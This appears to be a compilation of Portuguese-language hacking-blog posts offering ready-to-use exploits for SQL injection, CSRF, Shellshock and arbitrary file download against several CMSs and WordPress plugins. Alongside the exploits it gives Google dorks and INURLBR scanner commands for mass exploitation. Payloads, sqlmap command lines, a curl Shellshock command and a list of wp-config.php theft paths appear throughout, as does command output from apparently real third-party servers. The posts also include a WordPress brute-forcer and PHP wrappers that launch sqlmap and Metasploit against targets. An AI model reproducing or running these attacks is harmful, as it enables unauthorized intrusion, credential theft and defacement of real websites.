Exploit 0day CMS HB 1.5

0day - Exploit php explora SQL INJECTION via( GET/POST) em CMS brasileiro HB feito pela empresa "Agência HB Web e Cia".

[+] Discoverer Author: M3t4tr0n
[+] FACEBOOK: https://www.facebook.com/M3T4TR0N
[+] EMAIL: [email protected]
[*] Thanks M3t4tr0n

# SCRIPT by: [ I N U R L-B R A S I L ] - [ By GoogleINURL ]
# EXPLOIT NAME: XPL 0day CMS HB 1.5 / INURL BRASIL
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EA:http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil

Neither war between hackers, nor peace for the system.

------------------------------------------------------------------------------

[ + ] FAILURE REPORTED:
15/maio/2015

[ + ] Type:

ADMINISTRATIVE ACCESS PANEL

[ + ] Vendor:
http://www.hbwebecia.com.br/

[ + ] Version: 
HB 1.5

[ + ] Google Dork:
inurl:"base.php?pagina"

[ + ] FILE VULN:
/admin/logar.php

[ + ] POC:
(POST) http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar

[ + ] FILE VULN:
/base.php

[ + ] POC:
(GET) http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)

[ + ] Exploração SQLMAP output:
# Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe

# Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC

# Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--

[ + ] USE SQLMAP:
./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'
--dbs --random-agent --level 3 --risk 2--proxy 'http://localhost:8118' 
--dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only 
--flush-session --batch

[ + ] EXECUTE: 
php xpl.php -t http://target.us

[ + ] FILE_OUTPUT :
HB.txt

PRINT OUTPUT:

[ + ] Exploit: 
http://www.exploit4arab.net/exploits/1505 / http://pastebin.com/AY6sMthP

[ + ] EXPLOIT MASS USE SCANNER INURLBR:
php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'

PRINT OUTPUT:

More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR

Explorando CMS Aadi Infosolutions com SQLMAP + INURLBR EM MASSA

Nesse artigo vamos explorar um padrão SQLI no CMS da empresa "Aadi Infosolutions",  muito usado por clientes Indianos.
Vamos usar sqlmap para injeção de SQL e Scanner inurlbr para buscar alvos em massa.

[+] Discoverer Author: Killer~X
[+] EMAIL:             [email protected]
[+] FACEBOOK:          http://www.fb.com/xXalreshyXx
[+] ASK:               http://www.ask.fm/ALRESHY

[+] Dork:      
intext:"Aadi" & inurl:"page.php?id="

[+] POC:      
http://www.target.com/page.php?id=1+XPL_SQLI

[+] Exploit:
DEBUG: sqlmap  
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1630=1630 AND 'DBoa'='DBoa
Vector: AND [INFERENCE]

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' AND (SELECT 3932 FROM(SELECT COUNT(*),CONCAT(0x717a627671,(SELECT (ELT(3932=3932,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wUln'='wUln
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(10)))HrzP) AND 'jmET'='jmET
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a627671,0x465169724a72556d4e4f,0x716a6b7071),NULL-- 

    Vector:  UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL-- 

[+] Login Page: 
http://www.test.com/admin

[+] EXPLORING WITH SQLMAP:
sqlmap.py -u 'http://www.target.com/page.php?id=1' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch
OUTPUT PRINT:

[+] EXPLORING WITH MASS INURLBR:
php inurlbr.php --dork 'intext:"Aadi" & inurl:"page.php?id="' -s aadi.txt  -q 1,6 --exploit-get "?&id=1%270x27" --command-vul "sqlmap.py -u '_TARGETFULL_' -p id --random-agent --beep --level 3 --risk 2 --threads 2 --tor --check-tor --tor-type=SOCKS5 --dbs --dbms='Mysql' --time-sec 10 --batch"
OUTPUT PRINT:

REF
http://www.exploit4arab.net/exploits/1486

WordPress FBConnect SQL Injection Vulnerability + INURLBR VALIDATING HTML RETURN

[ + ] INURLBR 2.1
[ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN
[ + ] WORDPRESS:  Fbconnect
[ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1
[ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0
exec: fbconnect_action=myhome&fbuserid=1 + xpl

  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # EA:            http://www.exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil

[ + ] SEARCH DORK
--dork 'inurl:"?fbconnect_action="' 

---------------------------------------------------------------------------

[ + ] OUTPUT VULN
-s sqli.txt  

---------------------------------------------------------------------------

[ + ] ID SEARCH ENGINES 1 = GOOGLE + CSE, 6 GOOGLE API
-q 1,6 

---------------------------------------------------------------------------

[ + ] EXPLOIT GET
--exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0'

---------------------------------------------------------------------------

[ + ] TYPE INTERNAL VALIDATION
-t 2 

---------------------------------------------------------------------------

[ + ] SEARCH FOR CUSTOM VALUE
-a 'xpl_success' 

---------------------------------------------------------------------------

[ + ] FILTER HOSTS URL / MOD UNIQUE = HOST+XPL_GET
--unique

---------------------------------------------------------------------------

[ + ] CONVERTED VALUE
0x78706c5f73756363657373 = hex(xpl_success)

---------------------------------------------------------------------------

- We pass the value (hexdecimal)-'0x78706c5f73756363657373' in our sql injection.

Se a string 'xpl_success' aparecer no retorno html do nosso alvo, Significa que foi explorado com sucesso.
If the string 'xpl_success' appears on the html return of our target, it means that was successfully exploited.


Resumindo eu passo um valor pré-definido na minha injeção sql em formato hexdecimal no select ,caso tal valor retorne no formato string significa que foi executado com sucesso.
No tutorial converti a string xpl_success para hexadecimal que fica 78706c5f73756363657373, injeto no server ele executa e prita pro cliente.
No script INURLBR o parâmetro -t level 2 é pra ser validado com uma busca personalizada dentro do alvo, quando quero achar uma determinada string por isso usamos o comando -a complementando, -t 2 anula a busca de outros erros SQLI  e vai focar somente em nossa string passada através -a 'sua_string'.


if(HTML == xpl_success){ OK }


[ + ] COMMAND:
php inurlbrpriv8.php  --dork 'inurl:"?fbconnect_action="' -s sqli.txt -q 1,6 --exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0' -t 2 -a 'xpl_success' --unique

[ + ] VÍDEO:


DOWNLOAD SCANNER: 
https://github.com/googleinurl/SCANNER-INURLBR


REF
http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html
http://www.1337day.com/exploit/15790

XPL miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL

[+] Discoverer Author: Mustafa Moshkela  

REF COD POC: http://www.exploit4arab.net/exploits/1482

Greets to: all members in iq-team.org

Script makes a post without administrative credentials.

  ------------------------------------------------------------------------------

  # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  # EXPLOIT NAME:  XPL miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL
  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil

  ------------------------------------------------------------------------------

  # DATA SUBMISSION WITHOUT VALIDATION

  # Vendor:  http://www.spyka.net/scripts/php/miniblo

  # Google Dork: intext:"Powered by miniblog" ext:php

  # POC:  http://{YOU_URL}/adm/admin.php?mode=add

  # SEND REQUEST POST: adddata[post_title]=TITLE&data[post_content]=<b>YOU_POST</b>&data[published]=1&miniblog_PostBack=Add

  # EXECUTE:  php xpl.php -t http://target.us

  # FILE_OUTPUT:  miniblog_vuln.txt

  # EXPLOIT: http://pastebin.com/xPq4i95F

------------------------------------------------------------------------------

  # EXPLOIT MASS USE SCANNER INURLBR
php inurlbr.php --dork 'intext:"Powered by miniblog" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'

  More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR

  ------------------------------------------------------------------------------

OUTPUT SCAN EXEC:

Tool Xpl SHELLSHOCK Ch3ck - Mass exploitation

The tool inject a malicious user agent that allows exploring the vulnerabildiade sheellshock running server-side commands.

  # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  # EXPLOIT NAME:  Xpl SHELLSHOCK Ch3ck Tool - (MASS)/ INURL BRASIL
  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil

- DESCRIPTION - VULNERABILITY(SHELLSHOCK)

- CVE-2014-6271, CVE-2014-6277,
- CVE-2014-6278, CVE-2014-7169,
- CVE-2014-7186, CVE-2014-7187
Shellshock aka Bashdoor, is a security hole in the Bash shell on GNU's Unix-based systems, which was released on September 24, 2014.
Many servers on the Internet such as web servers use Bash to process commands, allowing an attacker to exploit the vulnerability Bash to execute arbitrary commands. This could allow an attacker to gain unauthorized access to a computer system.

- DESCRIPTION - TOOL
The tool inject a malicious user agent that allows exploring the vulnerability
sheelshock running server-side commands.

- DEPENDENCIES:
sudo apt-get install php5 php5-cli php5-curl

- EXECUTE:
     -t : SET TARGET.
  -f : SET FILE TARGETS.
  -c : SET COMMAND.
  -w : SET UPLOAD SHELL PHP.
  Execute:
  php xplSHELLSHOCK.php -t target -c command
  php xplSHELLSHOCK.php -f targets.txt -c command
  SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w
  OUTPUT VULN: SHELLSHOCK_vull.txt

- EXEMPLES:
php xpl.php -t 'http://www.xxxcamnpalxxx.com.br/cgi-bin/login.sh' -c pwd
CMD:
Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504  @ 2.00GHz GenuineIntel GNU/Linux
uid=1000(icone) gid=100(users) groups=100(users)
/ico/camnpal/cgi-bin
END_CMD:


php xpl.php -t 'http://www.xxxbnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd
CMD:
Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux
uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster)
/mnt/volume1/sitio/data/catalogos/cgi-bin
END_CMD:
OUTPUT:

- USE CURL MANUAL EXPLOIT::
curl -v --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"' 'http://www.xxxxxbnmxxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis'
OUTPUT:

- EXPLOIT MASS USE SCANNER INURLBR
./inurlbr.php --dork 'inurl:"/cgi-bin/login.sh"' -s out.txt -q 1,6 --command-vul "php xpl.php -t '_TARGETFULL_' -c pwd"

More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR

- ACESSO AO EXPLOIT:
Tool Xpl SHELLSHOCK Ch3ck
https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck



REFERENCES:
http://pt.wikipedia.org/wiki/Shellshock
http://curl.haxx.se/docs/manpage.html
https://shellshocker.net/

WordPress NEX-Forms 3.0 SQL Injection Vulnerability

The "submit_nex_form" ajax function is affected from SQL Injection vulnerability

  [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]

  -----------------------------------------------------------------------------

# AUTOR SCRIPT:  Cleiton Pinheiro / Nick: googleINURL
# Email:        [email protected]
# Blog:          http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:    https://fb.com/InurlBrasil
# Pastebin     http://pastebin.com/u/Googleinurl
# GIT:           https://github.com/googleinurl
# PSS:           http://packetstormsecurity.com/user/googleinurl
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS:          http://google.com/+INURLBrasil

- Who Discovered http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli
- Vulnerability discovered by: Claudio Viviani

  -----------------------------------------------------------------------------

- EXPLOIT NAME: MINI exploit-SQLMAP - WordPress NEX-Forms 3.0 SQL Injection Vulnerability / INURL BRASIL
- VENTOR:       https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
- Dork Google:  inurl:nex-forms-express-wp-form-builder
- Dork Google:  index of nex-forms-express-wp-form-builde
- GET VULN:     nex_forms_Id=(id)
- $nex_forms_Id=intval($_REQUEST['nex_forms_Id'])

  -----------------------------------------------------------------------------

- DBMS:        'MySQL'
- Exploit:       AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)

  -----------------------------------------------------------------------------

Info:  The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
POC: http://target/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=(id)+Exploit

  -----------------------------------------------------------------------------

- --help:
   -t : SET TARGET.
 -f : SET FILE TARGETS.
 -p : SET PROXY
  Execute:
  php wp3xplo1t.php -t target
  php wp3xplo1t.php -f targets.txt
  php wp3xplo1t.php -t target -p 'http://localhost:9090'

  -----------------------------------------------------------------------------

- EXPLOIT MASS USE SCANNER INURLBR
- COMMAND: 
./inurlbr.php --dork 'inurl:nex-forms-express-wp-form-builder' -s wp3xplo1t.txt -q 1,6 --command-all "php wp3xplo1t.php -t '_TARGET_'"

- DOWNLOAD INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

  -----------------------------------------------------------------------------

- INFO:           http://www.homelab.it/index.php/2015/04/21/wordpress-nex-forms-sqli/

[!] CODE XPL:
- Xpl script: https://github.com/googleinurl/WordPress-NEX-Forms-3.0-SQL-Injection-Vulnerability

OUTPUT PRINT: 

OUTPUT SQLMAP: 
 [03:18:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
 [03:20:45] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
 [03:24:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [03:24:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [03:25:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
 [03:25:11] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
 GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
 ---
 Parameter: nex_forms_Id (GET)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: action=submit_nex_form&nex_forms_Id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
 ---
 [03:25:12] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux
 web application technology: PHP 5.4.3, Apache 2.2.3
 back-end DBMS: MySQL 5.0.12

CONCEITO DE SUB_PROCESS / SCANNER INURLBR 2.0

 SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

============================================================

[!] LISTA DE STRING'S QUE SERÁ EXECUTADA(concatenada) PRA CADA ALVO ENCONTRADO.

1. ['LIST_XPL_NAME']: = listxpl_wordpress_afd.txt

Conteúdo arquivo - URL XPL Wordpress Vulnerability Arbitrary File Download:

• /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
• /wp-content/force-download.php?file=../wp-config.php
• /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
• /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
• /wp-content/themes/markant/download.php?file=../../wp-config.php
• /wp-content/themes/yakimabait/download.php?file=./wp-config.php
• /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
• /wp-content/themes/felis/download.php?file=../wp-config.php
• /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
• /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
• /wp-content/themes/epic/includes/download.php?file=wp-config.php
• /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
• /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
• /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
• /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
• /wp-content/themes/lote27/download.php?download=../../../wp-config.php
• /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
• /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
• /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
• /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
• /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
• /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
• /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php

--------------------------------------------------------------------------------------

[!] CMS WORDPRESS VALIDATION / INURLBR 2.0
 Já possui tal validação por padrão padrão interno.

• ['CMS-WORDPRESS-01'] = "define('DB_NAME'";
• ['CMS-WORDPRESS-02'] = "define('DB_USER'";
• ['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
• ['CMS-WORDPRESS-04'] = "define('DB_HOST'";

--------------------------------------------------------------------------------------

 [!] Running subprocesses:
 
 --sub-file  Subprocess performs an injection 
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt
         
 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get
         
 --sub-post defines whether the strings coming from 
     --sub-file will be injected via POST.
     Usage:   --sub-get

[!] Descrição de comando usado:

1. DEFINIR DORK:                       --dork 'DORK'
2. DEFINIR ARQUIVO FONTE:  -s 'output.txt'
3. DEFINIR DORK:                       --sub-file 'file_subprocess.txt'
4. FLAG TIPO REQUEST:            --sub-get / FLAG
5. FLAG FILTRO HOST:              --unique  / HOST ÚNICOS EM SEU RESULTADO

[!] COMMAND EXEC:
GO! GO! ~
php inurlbr.php --dork 'site:br "Index of /wp-content/plugins/revslider"' -s teste.txt --sub-file 'listxpl_wordpress_afd.txt' --sub-get --unique

--------------------------------------------------------------------------------------

CADA BARRINHA  QUE É DEMONSTRADA, É UM PROCESSO DE VALIDAÇÃO..
Dá mesma forma que usei uns (strings/urls)xpls Wordpress, pode ser usado de outros CMS's...
ou URL's padrões para tentar gerar erros SQLI no server, Ataques LFI dá mesma forma..

[!] VÍDEO DEMONSTRATIVO:

Baixar scanner INURLBR 2.0: 
https://github.com/googleinurl/SCANNER-INURLBR

• [+] AUTOR:       googleINURL
• [+] Blog:              http://blog.inurl.com.br
• [+] Twitter:          https://twitter.com/googleinurl
• [+] Fanpage:        https://fb.com/InurlBrasil
• [+] Pastebin         http://pastebin.com/u/Googleinurl
• [+] GIT:               https://github.com/googleinurl
• [+] PSS:               http://packetstormsecurity.com/user/googleinurl
• [+] YOUTUBE:   http://youtube.com/c/INURLBrasil
• [+] PLUS:            http://google.com/+INURLBrasil

[ Neither war between hackers, nor peace for the system. ]

Inurlbr dorking + Wordpress brute forcing

[ Inurlbr dorking + Wordpress brute forcing ]

    Eae galera, esses dias eu estava pesquisando algumas falhas em wordpress, então tive uma ideia de montar um script que realiza-se um bruteforce em wordpress's, Só que antes ele cata-se os sites com cms (Wordpress) e salva-se em um .txt.

    Pensei em fazer essa etapa de dorking na mão, mas pra quer ter esse trabalho todo quando se pode se utilizar o nosso scaner Inurlbr <3 com as dorks já definidas. Depois de catar as url na etapa de dorking com Inurlbr, Montei o script que verifica se aquela url trabalha ou não com Wordpress, caso não trabalhar ele te print na tela "Not is wordpress" caso contrario ele realizará o bruteforce com senhas padrões contidas dentro do código. No script tem poucas senhas mas você pode incrementar mas senhas ou se você tiver um pequeno conhecimento em python você pode colocar o script para carregar um wordlist.txt.

   A etapa de dorking você pode escolher em fazer manualmente ou deixar o script fazer por você, na execução ele ira te perguntar; Dorking use to find sites using the inurlbr? [Y][N].

[ COMMAND SCANNER INURLBR ]

• ./inurlbr.php -q 1,6 --dork "[DORK]inurl:wp-content site:.com.br[DORK]inurl:wp-content/plugins/ site:.com.br" -s list.txt --comand-all "echo _TARGET_ >> list.txt"
• Você pode adicionar mas dorks no comando do scanner, seperando elas com "[DORK]"

[ TOOLS ]

• wpbf.py: https://github.com/jh00nbr/Python/blob/master/wpbf.py
• Inurlbr.php:  https://github.com/googleinurl/SCANNER-INURLBR/blob/master/inurlbr.php

  [DEMO]

WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL

WORDPRESS EXPLOIT Revslider

Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress  é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css. 

Enviando a requisição:

Via post com seguintes campos:
array(

"action" => "revslider_ajax_action",

"client_action" => "update_captions_css",

 "data" => "_YOU_HTML_ADD_"

 );

Dentro no campo data é onde enviamos nosso HTML modificado.
Nossa array post com os dados já previamente preechidos são enviados para seguinte

URL - POST: http://{target}/wp-admin/admin-ajax.php

Com todo processo terminado podemos verifica se foi modificado o HTML do alvo.

URL - FINAL:  http://{target}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css 

USANDO EXPLOIT : 
DOWNLOAD:  http://pastebin.com/a2LHiD7U

EXECUTE:
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
         php exploit.php -t target
         php exploit.php -f targets
         php exploit.php -t target -p 'http://localhost:9090'

OUTPUT COMAND -t:

OUTPUT COMAND -f targets.txt:

Usando em massa com SCANNER INURLBR:
DOWNLOAD:
https://github.com/googleinurl/SCANNER-INURLBR 

COMANDO:
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'

OUTPUT:

REF: http://pastebin.com/eUUtgAtQ 

REF: http://blog.inurl.com.br/search/label/wordpress

Desenvolvendo Mini exploits, otimizando seu tempo.

Vamos otimizar nosso tempo criando mini exploits.

mini exploits defino da seguinte forma: É um conjunto de comandos que possibilita execução de varias rotinas, assim poupando tempo. A não ser que queira toda vez digitar sempre os mesmos parâmetros.
Criaremos um mini exploit que vamos usar junto ao SCANNER INURLBR, mas antes você deve entender os parâmetros especiais do scanner INURLBR que usaremos.

1. _TARGET_ é um parâmetro especial que passando para que seja substituído pelo domínio do nosso alvo.
2. _TARGETFULL_ é um parâmetro especial que passando para que seja substituído pela URL inteira do nosso alvo.

Mais detalhes:
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Tais parâmetros são usados nos comandos de execução em terminal.

• Comando --comand-vul {comando_terminal}--comand-vul Executa comandos no terminal para cada URL encontrada vulnerável.
• Comando --comand-all {comando_terminal}--comand-all Executa comandos no terminal para todas URL's encontradas.

Ex:
Logica de uso:

O scanner INURLBR filtra os resultados dos motores de busca em seguida executando comandos no terminal através dos parâmetros --comands all & vul.

Com tal logica em mente agora podemos criar um mini exploit para executar o SQLMAP em ataques de sql injection, seja ele remoto ou localhost.

1 - Criaremos um miniexploit.php
2 - Agora vamos inserir nossa programação que captura o alvo e toma as devidas rotinas necessárias.

<?php

#COMENTÁRIO:  printando na tela uma mensagem.
echo "[+]  MINI exploit-SQLMAP\n"; 
#COMENTÁRIO: capturando o primeiro parâmetro passado para nosso script.
$target = $argv[1]; 
#COMENTÁRIO: comando sqlmap pronto agora vamos concatenar nosso alvo ao comando.
$command = "sqlmap -u '{$target}' --batch --random-agent --level 2 --risk 1  --answers='follow=N'";
#COMENTÁRIO: agora vamos usar function nativa do php para executar o SQLMAP contra nosso alvo.
system($command, $dados).empty($dados[0]) ? exit() : NULL;

?>

Executando nosso script:
php miniexploit.php http://www.target.com.br

Com nosso exploit funcionando agora vamos vincular com scanner INURLBR.
Comando INURLBR:
Se deseja usar filtro em motores de busca:
ex: php inurlbr.php --dork 'SUA_DORK' -s salvar.txt -q 1,6  --comand-all "php  miniexploit.php '_TARGETFULL_'"

Execução:

Comando executado:

./inurlbr.php --dork 'inurl:php site:.br inurl:(id|pag|new|abir|open|acess) & "Warning: "' -s save.txt -q 1,6 --command-all "php miniexploit.php '_TARGETFULL_'"

Tal logica pode ser usada para executar mais de um comando ou exploit especifico:
Exemplo em código PHP:

$target = $argv[1]; 
$command = "nmap -sV -p 22,80,21 {$target}";
system($command, $dados);

$command = "nikto -h {$target}";
system($command, $dados).empty($dados[0]) ? exit() : NULL;

Exemplo usando msfcli do metasploit  - Hunting For MSSQL:

$target = $argv[1]; 
$command = "msfcli auxiliary/scanner/mssql/mssql_ping RHOSTS={$target} E";

system($command, $dados).empty($dados[0]) ? exit() : NULL;

Resultado é semelhante a isso:
[*] SQL Server information for $target:
[*] tcp = 1433
[*] np = SSHACKTHISBOX-0pipesqlquery
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SSHACKTHISBOX-0
[*] Auxiliary module execution completed

Vídeo aula criando um script em Bash pra otimizar um ataque junto ao msfcli.

BAIXAR SCRIPT SCANNER INURLBR

https://github.com/googleinurl/SCANNER-INURLBR

REF'S:
hunting for MSSQL

http://www.offensive-security.com/metasploit-unleashed/Hunting_For_MSSQL

msfcli-basics tutorial

https://www.hackthissite.org/articles/read/1135

msfcli provides a powerful command-line interface to the framework.

http://luom.net/metasploit-unleashed/Msfcli.html

metasploit-unleashed

http://www.offensive-security.com/metasploit-unleashed/Msfcli

learning metaploit framework

http://cs.uccs.edu/~cs591/metasploit/users_guide3_1.pdf

basics of penetration testing

http://www.netpro.me/uploads/1/0/8/7/10874032/openmirrors.com__the_basics_of_hacking_and_penetration_testing__ethical_hacking_and_penetration_testing_made_easy.pdf

bash-scripting with msfcli

http://www.youtube.com/watch?v=Jt6ynMun8Tk

metasploit with 1 command
http://www.governmentsecurity.org/forum/topic/18963-metasploit-with-1-command/

exploiting windows 2003 server reverse shell
http://resources.infosecinstitute.com/exploiting-windows-2003-server-reverse-shell/

WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection / MINI EXPLOIT SQLMAP + SCANNER INURLBR

O WordPress SEO by Yoast plugin é usado por milhões de sites WordPress que querem ser encontrados na internet. O WordPress SEO by Yoast plugin é plugin gratuito voltado para otimização de sites para motores de busca, com intuito de aumentar seu ranking page em motores.

Descrição Técnica:

